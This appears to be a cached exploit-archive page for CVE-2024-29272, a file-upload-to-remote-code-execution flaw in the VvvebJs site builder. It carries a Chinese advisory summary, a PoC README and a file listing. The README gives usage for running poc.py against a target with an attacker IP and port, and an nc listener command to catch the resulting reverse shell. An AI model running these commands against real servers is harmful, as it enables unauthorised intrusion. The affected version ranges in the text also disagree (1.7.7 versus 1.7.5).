CVE-2024-29272 PoC — VvvebJs 安全漏洞

Source

https://github.com/awjkjflkwlekfdjs/CVE-2024-29272

Associated Vulnerability

Title:VvvebJs 安全漏洞 (CVE-2024-29272)
Description:VvvebJs是Givan个人开发者的一个拖放网站生成器。 VvvebJs 1.7.7之前版本存在安全漏洞，该漏洞源于存在任意文件上传漏洞，允许未经身份验证的远程攻击者通过save.php中的sanitizeFileName参数执行任意代码并获取敏感信息。

Readme

# CVE-2024-29272
This is a Proof-of-Concept for CVE-2024-29272, an unauthenticated arbritrary file upload vulnerability that leads to remote code execution on versions of VvvebJS < 1.7.5

usage:
```
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
```

in another terminal:
```
nc -lvnp <ATTACKER PORT>
```

File Snapshot


 [4.0K]  /data/pocs/d48267b7e774e6460153239fa5cb4373d333a8f1
├── [1.5K]  poc.py
└── [ 318]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!